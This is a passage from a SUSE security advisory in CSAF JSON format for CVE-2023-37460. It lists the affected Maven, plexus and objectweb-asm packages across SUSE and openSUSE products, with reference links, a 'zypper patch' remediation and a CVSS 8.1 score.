"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP5:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Manager Proxy 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Manager Server 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Manager Server Module 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:maven-archiver-3.6.1-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-assembly-plugin-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-plugin-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-tree-3.2.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-api-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-rules-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-3.9.0-150200.3.7.5.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-script-ant-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-script-beanshell-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:objectweb-asm-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:objectweb-asm-javadoc-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-extras-2.14.2-150200.3.9.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-37460",
"url": "https://www.suse.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "SUSE Bug 1215973 for CVE-2023-37460",
"url": "https://bugzilla.suse.com/1215973"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Enterprise Storage 7.1:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Enterprise Storage 7.1:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Enterprise Storage 7.1:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP5:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Manager Proxy 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Manager Server 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Manager Server Module 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:maven-archiver-3.6.1-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-assembly-plugin-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-plugin-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-tree-3.2.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-api-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-rules-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-3.9.0-150200.3.7.5.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-script-ant-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-script-beanshell-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:objectweb-asm-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:objectweb-asm-javadoc-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-extras-2.14.2-150200.3.9.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Enterprise Storage 7.1:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Enterprise Storage 7.1:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Enterprise Storage 7.1:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Enterprise Storage 7.1:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP5:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP5:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP2-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
